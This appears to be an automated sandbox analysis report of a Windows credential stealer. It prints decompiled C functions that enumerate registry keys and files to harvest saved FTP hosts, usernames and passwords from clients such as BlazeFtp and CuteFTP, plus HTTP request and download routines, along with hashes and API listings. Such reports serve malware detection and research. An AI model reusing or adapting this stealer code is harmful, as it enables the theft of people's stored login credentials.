Instruction ID: 5f0e69666c37055548565fce8565ad50753ab55e3f11aef87143afabb8110fab
Opcode Fuzzy Hash: 7d0ffad731660568f56f8f0a0490f44f83ea71fa47bb78a974b8c01c4dd83acf
Instruction Fuzzy Hash: 8B41A471950118BADF226F51CC02FDD7ABAFF04344F1085BAB548750B1DF7A9AA1AF88

Uniqueness

Uniqueness Score: -1.00%

Function 004073A7, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004073A7(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				long _t56;
				long _t57;
				long _t60;

				_t56 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t57 = _t56;
				if(_t57 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t60 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t61 = _t60;
						if(_t60 != 0) {
							break;
						}
						_v2068 = E00401DF8( &_v2064, E00401DF8(_t61, _a12, "\\"),  &_v2064);
						E004018B8(_t62);
						_v2080 = E00401D71(_a8, _v2068, "FtpPassword", 0);
						_v2084 = E00401D71(_a8, _v2068, "_FtpPassword", 0);
						_v2072 = E00401D71(_a8, _v2068, "FtpServer", 0);
						_v2076 = E00401D71(_a8, _v2068, "FtpUserName", 0);
						_v2088 = E00401D71(_a8, _v2068, "FtpDirectory", 0);
						if(_v2080 != 0 || _v2084 != 0) {
							if(_v2072 != 0 && _v2076 != 0) {
								E004015CB(E004015CB(E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076), _a4, _v2080), _a4, _v2084), _a4, _v2088);
							}
						}
						E004018B8(_v2080);
						E004018B8(_v2084);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2088);
						E004073A7(_a4, _a8, _v2068);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t57;
			}

0x004073ba
0x004073bf
0x004073c1
0x004073c7
0x004073ce
0x004073ce
0x004073ee
0x004073f3
0x004073f5
0x00000000
0x00000000
0x00407419
0x0040741f
0x00407439
0x00407454
0x0040746f
0x0040748a
0x004074a5
0x004074b2
0x004074c4
0x0040751d
0x0040751d
0x004074c4
0x00407528
0x00407533
0x0040753e
0x00407549
0x00407554
0x00407565
0x00407570
0x00407575
0x00407575
0x00000000
0x00407580
0x00407586

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 004073BA
RegEnumKeyExA.ADVAPI32 ref: 004073EE
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407580

Strings

FtpServer, xrefs: 0040745C
FtpPassword, xrefs: 00407426
FtpUserName, xrefs: 00407477
FtpDirectory, xrefs: 00407492
_FtpPassword, xrefs: 00407441

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
API String ID: 1332880857-980612798
Opcode ID: 4b7ca1576e316fec70c5d8640cf292bae4574fe58d1b6cbb250eeb2e81953c95
Instruction ID: f08fa55c07ec5e6899d33725599ea259e95770034ce1eb7242ec538371f35ae2
Opcode Fuzzy Hash: 4b7ca1576e316fec70c5d8640cf292bae4574fe58d1b6cbb250eeb2e81953c95
Instruction Fuzzy Hash: CC41A33194011CBADF216F51CC42BDD7ABABF04344F14C1BAB958740B1DB7A5B91AF89

Uniqueness

Uniqueness Score: -1.00%

Function 004061E4, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004061E4(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				long _t48;
				long _t49;
				long _t52;

				_t48 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
				_t49 = _t48;
				if(_t49 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t52 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t53 = _t52;
						if(_t52 != 0) {
							break;
						}
						_v2068 = E00401DF8( &_v2064, E00401DF8(_t53, _a8, "\\"),  &_v2064);
						E004018B8(_t54);
						_v2080 = E00401D71( *0x414869, _v2068, "Password", 0);
						_v2072 = E00401D71( *0x414869, _v2068, "HostName", 0);
						_v2084 = E00401D71( *0x414869, _v2068, "Port", 0);
						_v2076 = E00401D71( *0x414869, _v2068, "Username", 0);
						_v2088 = E00401D71( *0x414869, _v2068, "HostDirName", 0);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E004015CB(E004015CB(E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076), _a4, _v2080), _a4, _v2084), _a4, _v2088);
						}
						E004018B8(_v2080);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2084);
						E004018B8(_v2088);
						E004061E4(_a4, _v2068);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t49;
			}

0x004061fa
0x004061ff
0x00406201
0x00406207
0x0040620e
0x0040620e
0x0040622e
0x00406233
0x00406235
0x00000000
0x00000000
0x00406259
0x0040625f
0x0040627c
0x0040629a
0x004062b8
0x004062d6
0x004062f4
0x00406301
0x00406363
0x00406363
0x0040636e
0x00406379
0x00406384
0x0040638f
0x0040639a
0x004063a8
0x004063b3
0x004063b8
0x004063b8
0x00000000
0x004063c3
0x004063c9

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 004061FA
RegEnumKeyExA.ADVAPI32 ref: 0040622E
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004063C3

Strings

Password, xrefs: 00406266
Port, xrefs: 004062A2
HostName, xrefs: 00406284
HostDirName, xrefs: 004062DE
Username, xrefs: 004062C0

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostDirName$HostName$Password$Port$Username
API String ID: 1332880857-791697221
Opcode ID: 7eba9d724454c8d3d3aac0edc315d2f4187c84c0ac834a3e46261e4250268ee2
Instruction ID: fc2fdb558613e9c2e8b18701f4f9e27659267ba30ef1847d2d636ab8c18341a6
Opcode Fuzzy Hash: 7eba9d724454c8d3d3aac0edc315d2f4187c84c0ac834a3e46261e4250268ee2
Instruction Fuzzy Hash: D641C33594011CBADF227B61CC42BDC7ABABF44344F10C5BAB554740F1DB7A5AA1AF88

Uniqueness

Uniqueness Score: -1.00%

Function 00403BFF, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 112
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00403BFF(void* __eflags, char* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				long _v20;
				void* _v24;
				signed int _v44;
				long _v48;
				int _v52;
				void* _v68;
				CHAR* _v72;
				int _v76;
				char* _v80;
				long _v84;
				int _t53;
				int _t61;
				int _t67;
				int _t71;
				int _t72;
				int _t73;
				int _t75;
				int _t76;

				_t76 = 0;
				_v8 = E004018CF(0x2000);
				_v80 = E004018CF(0x2000);
				_v72 = E004018CF(0x2000);
				memset( &_v68, 0, 0x3c << 0);
				_v68 = 0x3c;
				_v48 = 0x1fff;
				_v20 = 0x1fff;
				_push(_v8);
				_pop( *_t10);
				_push(_v80);
				_pop( *_t12);
				_t53 = InternetCrackUrlA(_a4, 0, 0x80000000,  &_v68); // executed
				if(_t53 == 0 || _v52 == 0) {
				} else {
					_v84 = 0x1fff;
					_t61 = InternetCreateUrlA( &_v68, 0x80000000, _v72,  &_v84);
					__eflags = _t61;
					if(_t61 != 0) {
						 *_v80 = 0;
						memset( &_v68, 0, 0x3c << 0);
						_v68 = 0x3c;
						_push(_v80);
						_pop( *_t25);
						_v48 = 0x1fff;
						_v20 = 0x1fff;
						_t67 = InternetCrackUrlA(_v72, 0, 0,  &_v68);
						__eflags = _t67;
						if(_t67 == 0) {
							L7:
							L14:
							E004018B8(_v80);
							E004018B8(_v72); // executed
							E004018B8(_v8);
							return _t76;
						}
						__eflags = _v52;
						if(_v52 != 0) {
							wsprintfA(_v72, "GET %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nConnection: close\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n\r\n", _v80, _v8);
							_t71 = E00403800(_v44 & 0x0000ffff, 0, _v8, 0, _v44 & 0x0000ffff); // executed
							_t72 = _t71;
							__eflags = _t72;
							if(_t72 != 0) {
								_v76 = _t72;
								_push(_v72);
								L0041066A();
								_t73 = E00403884(_v76, _v72, _t72); // executed
								__eflags = _t73;
								if(__eflags != 0) {
									_t75 = E00403A78(0, __eflags, _v76, _a8, _a12); // executed
									_t76 = _t75;
								}
								_push(_v76);
								L00410844();
							}
							goto L14;
						}
						goto L7;
					}
				}
			}

0x00403c07
0x00403c13
0x00403c20
0x00403c2d
0x00403c3a
0x00403c3c
0x00403c43
0x00403c4a
0x00403c51
0x00403c54
0x00403c57
0x00403c5a
0x00403c6b
0x00403c72
0x00403c7f
0x00403c7f
0x00403c96
0x00403c9b
0x00403c9d
0x00403ca7
0x00403cb4
0x00403cb6
0x00403cbd
0x00403cc0
0x00403cc3
0x00403cca
0x00403cdc
0x00403ce1
0x00403ce3
0x00403ceb
0x00403d4d
0x00403d50
0x00403d58
0x00403d60
0x00403d6a
0x00403d6a
0x00403ce5
0x00403ce9
0x00403cfb
0x00403d0d
0x00403d12
0x00403d12
0x00403d14
0x00403d18
0x00403d1b
0x00403d1e
0x00403d2a
0x00403d2f
0x00403d31
0x00403d3e
0x00403d43
0x00403d43
0x00403d45
0x00403d48
0x00403d48
0x00000000
0x00403d14
0x00000000
0x00403ce9
0x00403c9f

APIs

Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C6B
InternetCreateUrlA.WININET(0000003C,80000000,?,00001FFF), ref: 00403C96
InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403CDC
wsprintfA.USER32 ref: 00403CFB
lstrlen.KERNEL32(?,00002000,00002000), ref: 00403D1E
closesocket.WSOCK32(?,?,00002000,00002000), ref: 00403D48

Strings

GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403CF3
<, xrefs: 00403CB6

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
String ID: <$GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
API String ID: 4072649068-555445111
Opcode ID: 9b4a33679b9f5da03f179997dbc4edbb3de2beb14b5e86672144839bbb3afef6
Instruction ID: 2c93f55174f4879a4db6f1b7e4dd790b8fca9e33e28acec0cc160ac5bd5080f0
Opcode Fuzzy Hash: 9b4a33679b9f5da03f179997dbc4edbb3de2beb14b5e86672144839bbb3afef6
Instruction Fuzzy Hash: 7041F672D04209EAEF11AFA1CC41BEDBEBAFF04305F10403AF510B52A1D7B95A569B19

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5C0, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 108
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D5C0(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				long _t46;
				long _t47;
				long _t50;

				_t46 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
				_t47 = _t46;
				if(_t47 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t50 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t51 = _t50;
						if(_t50 != 0) {
							break;
						}
						_v2088 = E00401DF8( &_v2064, E00401DF8(_t51, _a8, "\\"),  &_v2064);
						E004018B8(_t52);
						_v2068 = E00401D71( *0x414869, _v2088, "Host", 0);
						_v2072 = E00401D71( *0x414869, _v2088, "User", 0);
						_v2076 = E00401D71( *0x414869, _v2088, "Pass", 0);
						_v2080 = E00401D71( *0x414869, _v2088, "Port", 0);
						_v2084 = E00401D71( *0x414869, _v2088, "Remote Dir", 0);
						if(_v2072 != 0) {
							E004015CB(E004015CB(E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2068), _a4, _v2072), _a4, _v2076), _a4, _v2080), _a4, _v2084);
						}
						E0040D5C0(_a4, _v2088);
						E004018B8(_v2088);
						E004018B8(_v2068);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2080);
						E004018B8(_v2084);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t47;
			}

0x0040d5d6
0x0040d5db
0x0040d5dd
0x0040d5e3
0x0040d5ea
0x0040d5ea
0x0040d60a
0x0040d60f
0x0040d611
0x00000000
0x00000000
0x0040d635
0x0040d63b
0x0040d658
0x0040d676
0x0040d694
0x0040d6b2
0x0040d6d0
0x0040d6dd
0x0040d72d
0x0040d72d
0x0040d73b
0x0040d746
0x0040d751
0x0040d75c
0x0040d767
0x0040d772
0x0040d77d
0x0040d782
0x0040d782
0x00000000
0x0040d78d
0x0040d793

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040D5D6
RegEnumKeyExA.ADVAPI32 ref: 0040D60A
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D78D

Strings

Port, xrefs: 0040D69C
User, xrefs: 0040D660
Host, xrefs: 0040D642
Remote Dir, xrefs: 0040D6BA
Pass, xrefs: 0040D67E

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Pass$Port$Remote Dir$User
API String ID: 1332880857-1775099961
Opcode ID: 25950911e23618f4f12ae4368c0fa88c2745727d3b78f0d5148ddaa2483c3d76
Instruction ID: 1fd05541a01a89dffe010ef35692abe6d580daf26f61a96ca8e157ebfd96a9e0
Opcode Fuzzy Hash: 25950911e23618f4f12ae4368c0fa88c2745727d3b78f0d5148ddaa2483c3d76
Instruction Fuzzy Hash: 0641F435940118BADF227B61CD02FDC7ABABF44304F10C5B6B548740B1DB7A5A91AF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040C823, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040C823(void* __ebx, void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				void* __edi;
				intOrPtr _t34;
				char* _t49;
				intOrPtr _t53;
				void* _t56;
				void* _t57;
				char* _t58;

				_t57 = __ecx;
				_t56 = __ebx;
				_v8 = E004015F0(_a4, 0x3f, 0);
				_t58 =  *0x4147ed; // 0x640b38
				if( *_t58 == 0) {
					L5:
					E0040439C(_a4, "\\BlazeFtp", "site.dat", 0xbeef0000); // executed
					_t34 = E00401D71( *0x414869, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastPassword", 0); // executed
					_v24 = _t34;
					_v16 = E00401D71( *0x414869, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastAddress", 0);
					_v20 = E00401D71( *0x414869, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastUser", 0);
					_v28 = E00401D71( *0x414869, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastPort",  &_v32);
					if(_v16 != 0 && _v20 != 0) {
						_t65 = _v24;
						if(_v24 != 0) {
							E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0001), _a4, _v16), _a4, _v20), _a4, _v24);
							E0040159F(_a4, _v28, _v32);
						}
					}
					E004018B8(_v24);
					E004018B8(_v16);
					E004018B8(_v20);
					E004018B8(_v28);
					return E00401636(_t56, _t57, _t58, _t65, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 = StrStrIA(_t58, "BlazeFtp");
					_t60 = _t49;
					if(_t49 != 0) {
						_t53 = E0040242B(_t60, _t58);
						if(_t53 != 0) {
							_v12 = _t53;
							E00404351(_a4, _v12, "site.dat", 0xbeef0000);
							E004018B8(_v12);
						}
					}
					asm("cld");
					_t57 = 0xffffffff;
					asm("repne scasb");
				} while ( *_t58 != 0);
				goto L5;
			}

0x0040c823
0x0040c823
0x0040c836
0x0040c839
0x0040c842
0x0040c88b
0x0040c89d
0x0040c8b4
0x0040c8b9
0x0040c8d3
0x0040c8ed
0x0040c909
0x0040c910
0x0040c918
0x0040c91c
0x0040c947
0x0040c955
0x0040c955
0x0040c91c
0x0040c95d
0x0040c965
0x0040c96d
0x0040c975
0x0040c987
0x00000000
0x00000000
0x00000000
0x0040c844
0x0040c844
0x0040c84a
0x0040c84f
0x0040c851
0x0040c859
0x0040c85b
0x0040c85d
0x0040c870
0x0040c878
0x0040c878
0x0040c85b
0x0040c87d
0x0040c880
0x0040c885
0x0040c887
0x00000000

APIs

StrStrIA.SHLWAPI(00640B38,BlazeFtp), ref: 0040C84A

Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

\BlazeFtp, xrefs: 0040C895
BlazeFtp, xrefs: 0040C844
LastAddress, xrefs: 0040C8BE
LastPort, xrefs: 0040C8F4
LastPassword, xrefs: 0040C8A4
LastUser, xrefs: 0040C8D8
site.dat, xrefs: 0040C865, 0040C890
Software\FlashPeak\BlazeFtp\Settings, xrefs: 0040C8A9, 0040C8C3, 0040C8DD, 0040C8F9

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
API String ID: 1884169789-2976447346
Opcode ID: 47488ed6a2fbd4181536ff25fc21e10080c7204c1fc40f0ca6e583d0fb8b7ff6
Instruction ID: 2aaa60dbd0995c362339c6ee2767abb90b7bbf48d78d9c31007efe50a139024b
Opcode Fuzzy Hash: 47488ed6a2fbd4181536ff25fc21e10080c7204c1fc40f0ca6e583d0fb8b7ff6
Instruction Fuzzy Hash: DA311731940109BADF127BA1CC42FEE7E72AF80744F10863BB514351F1D7B99A919B8C

Uniqueness

Uniqueness Score: -1.00%

Function 004053C3, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004053C3(void* __ebx, void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __edi;
				char* _t28;
				void* _t35;
				void* _t36;
				char* _t37;

				_t36 = __ecx;
				_t35 = __ebx;
				_v8 = E004015F0(_a4, 4, 0);
				_t37 =  *0x4147ed; // 0x640b38
				if( *_t37 == 0) {
					L5:
					E0040531A(_t36, _t41, _a4, 0x1a); // executed
					E0040531A(_t36, _t41, _a4, 0x23); // executed
					E0040531A(_t36, _t41, _a4, 0x1c); // executed
					E0040531A(_t36, _t41, _a4, 0x26); // executed
					E00405199(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar"); // executed
					E00405199(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar"); // executed
					E00405199(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar"); // executed
					E00405199(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar"); // executed
					E00405199(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar"); // executed
					E00405199(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar"); // executed
					return E00401636(_t35, _t36, _t37, _t41, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t28 = StrStrIA(_t37, "CUTEFTP"); // executed
					_t39 = _t28;
					if(_t28 != 0) {
						_t32 = E0040242B(_t39, _t37);
						if(E0040242B(_t39, _t37) != 0) {
							E004051E3(_t36, _a4, _t32, "\\sm.dat");
							E004018B8(_t32);
						}
					}
					asm("cld");
					_t36 = 0xffffffff;
					asm("repne scasb");
					_t41 =  *_t37;
				} while ( *_t37 != 0);
				goto L5;
			}

0x004053c3
0x004053c3
0x004053d6
0x004053d9
0x004053e2
0x0040541f
0x00405424
0x0040542e
0x00405438
0x00405442
0x0040544f
0x0040545c
0x00405469
0x00405476
0x00405483
0x00405490
0x004054a2
0x00000000
0x00000000
0x00000000
0x004053e4
0x004053e4
0x004053ea
0x004053ef
0x004053f1
0x004053f9
0x004053fb
0x00405407
0x0040540c
0x0040540c
0x004053fb
0x00405411
0x00405414
0x00405419
0x0040541b
0x0040541b
0x00000000

APIs

StrStrIA.SHLWAPI(00640B38,CUTEFTP), ref: 004053EA

Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 00405447
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 0040547B
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405454
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 00405488
CUTEFTP, xrefs: 004053E4
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 00405461
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 0040546E
\sm.dat, xrefs: 004053FE

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
API String ID: 1884169789-2738976122
Opcode ID: f848c49cb20d6f1ba6bb938085becd1c3ada2ade320e3e777dafe4c2c13884a6
Instruction ID: d288d778f3b0420d84bf39ae9e8e3b7741dd64c7b166df527bd21b083190309a
Opcode Fuzzy Hash: f848c49cb20d6f1ba6bb938085becd1c3ada2ade320e3e777dafe4c2c13884a6
Instruction Fuzzy Hash: 6011F174550A04BADF123F21CC02FDE3E61EB91785F10413AB9087C0E6DBB98A919E9C

Uniqueness

Uniqueness Score: -1.00%

Function 00403A78, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 134
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00403A78(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char** _a12) {
				char* _v8;
				int _v12;
				void* _v16;
				void* __edi;
				void* __ebp;
				void* _t39;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t52;
				char* _t54;
				char* _t56;
				char* _t64;
				char** _t78;
				void* _t79;
				char* _t81;
				char* _t82;
				void* _t83;
				char* _t85;
				char* _t86;
				void* _t87;
				void* _t88;

				_t88 = __eflags;
				_v8 = E004018CF(0x3a98);
				E00401000( &_v16, __ecx, _t88,  &_v16);
				_t64 = 0;
				while(1) {
					_push(0x1e);
					_t39 = E00403930(_t79, _a4, _v16, 0xfa00, 0xa); // executed
					_t90 = _t39;
					if(_t39 == 0 || E00401082(_t39, _t79, _t90, _v16) > 0xfa00) {
						break;
					}
					__eflags = E00403A2A(_v16);
					if(__eflags == 0) {
						continue;
					}
					E004012BB(_t44, __eflags);
					 *((intOrPtr*)( *_v16 + 0xc))(_v16, _v8, 0x2134, 0, _v16);
					_v12 = 0;
					_t47 = StrStrIA(_v8, "Content-Length:");
					_push(_t64);
					_t48 = _t47;
					__eflags = _t48;
					if(_t48 != 0) {
						_push("Content-Length:");
						L0041066A();
						_t85 =  &(_t48[_t48]);
						_t86 =  &(_t85[1]);
						asm("repne scasb");
						__eflags = 0;
						 *((char*)(_t86 - 1)) = 0;
						_v12 = StrToIntA(_t86);
						_t87 = _t86;
						 *((char*)(_t87 - 1)) = 0xd;
						_t79 = _t85;
					}
					_pop(_t65);
					_t49 = StrStrIA(_v8, "Location:");
					_t50 = _t49;
					__eflags = _t50;
					if(__eflags != 0) {
						_push("Location:");
						L0041066A();
						_t81 =  &(_t50[_t50]);
						_push(_t81);
						_t82 =  &(_t81[1]);
						asm("repne scasb");
						 *((char*)(_t82 - 1)) = 0;
						_push(_t82);
						_t50 = E00402A1D(0, _t82);
						_t78 = _a12;
						__eflags = _t78;
						if(__eflags == 0) {
							_t50 = E004018B8(_t50);
						} else {
							 *_t78 = _t50;
						}
						_pop(_t83);
						 *((char*)(_t83 - 1)) = 0xd;
						_pop(_t79);
					}
					_pop(_t64);
					_push(_v16);
					E0040131F(_t50, __eflags);
					__eflags = _v12;
					if(_v12 <= 0) {
						_v12 = 0xa00000;
					}
					_t52 = E004039A2(_a4, _v16, _v12); // executed
					_t54 = E00401082(_t52, _t79, __eflags, _v16);
					__eflags = _t54;
					if(_t54 != 0) {
						__eflags = _t54;
						if(_t54 != 0) {
							_t56 =  *((intOrPtr*)( *_v16 + 0x34))(_v16, _a8);
							__eflags = _t56;
							if(_t56 >= 0) {
								_t64 = 1;
							}
						}
					}
					break;
				}
				 *((intOrPtr*)( *_v16 + 8))(_v16);
				E004018B8(_v8);
				return _t64;
			}

0x00403a78
0x00403a8a
0x00403a91
0x00403a96
0x00403a98
0x00403a98
0x00403aa7
0x00403aac
0x00403aae
0x00000000
0x00000000
0x00403ad0
0x00403ad2
0x00000000
0x00000000
0x00403ad7
0x00403aee
0x00403af1
0x00403b00
0x00403b05
0x00403b06
0x00403b06
0x00403b08
0x00403b0c
0x00403b11
0x00403b16
0x00403b19
0x00403b23
0x00403b2a
0x00403b2c
0x00403b37
0x00403b3a
0x00403b3b
0x00403b3f
0x00403b3f
0x00403b40
0x00403b49
0x00403b4f
0x00403b4f
0x00403b51
0x00403b55
0x00403b5a
